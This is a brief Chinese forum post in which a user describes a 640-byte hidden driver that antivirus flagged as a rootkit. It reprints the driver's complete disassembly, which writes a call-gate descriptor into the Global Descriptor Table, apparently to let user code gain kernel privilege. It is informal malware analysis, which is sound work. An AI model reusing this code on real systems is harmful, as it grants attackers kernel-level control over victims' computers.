前幾日在我的機子上,發現了一個了隱藏的SYS文件,AntiVir報毒爲RootKit,看了一下才發現原來它很苗條,只是640Bytes,很有秀惑力吧:
.text:00010200 .686p
.text:00010200 .mmx
.text:00010200 .model flat
.text:00010200
.text:00010200 ; 屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯?
.text:00010200
.text:00010200 ; Segment type: Pure code
.text:00010200 ; Segment permissions: Read/Execute
.text:00010200 _text segment para public 'CODE' use32
.text:00010200 assume cs:_text
.text:00010200 ;org 10200h
.text:00010200 assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
.text:00010200
.text:00010200 ; 壙壙壙壙壙壙壙?S U B R O U T I N E 壙壙壙壙壙壙壙壙壙壙壙壙壙壙壙壙壙壙壙?
.text:00010200
.text:00010200 ; Attributes: bp-based frame
.text:00010200
.text:00010200 public start
.text:00010200 start proc near
.text:00010200
.text:00010200 var_2A = qword ptr -2Ah
.text:00010200
.text:00010200 push ebp
.text:00010201 mov ebp, esp
.text:00010203 nop
.text:00010204 nop
.text:00010205 nop
.text:00010206 nop
.text:00010207 pushf
.text:00010208 pusha
.text:00010209 push edx
.text:0001020A sgdt [esp+28h+var_2A]
.text:0001020F pop edx
.text:00010210 mov eax, edx
.text:00010212 mov ecx, 3E0h
.text:00010217 mov byte ptr [edx], 0C3h
.text:0001021A mov [ecx+edx], ax
.text:0001021E shr eax, 10h
.text:00010221 mov [ecx+edx+6], ax
.text:00010226 mov dword ptr [ecx+edx+2], 0EC0003E8h
.text:0001022E mov dword ptr [ecx+edx+8], 0FFFFh
.text:00010236 mov dword ptr [ecx+edx+0Ch], 0CF9A00h
.text:0001023E popa
.text:0001023F popf
.text:00010240 mov eax, 0
.text:00010245 leave
.text:00010246 retn 8
.text:00010246 start endp
.text:00010246
.text:00010246 ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?
.text:00010249 align 20h
.text:00010249 _text ends
.text:00010249
.text:00010249
.text:00010249 end start
單從這段代碼上來看,好像沒有隱藏文件的功能,肯定還有其它的不乾淨東西,錄找中.
發貼留個紀念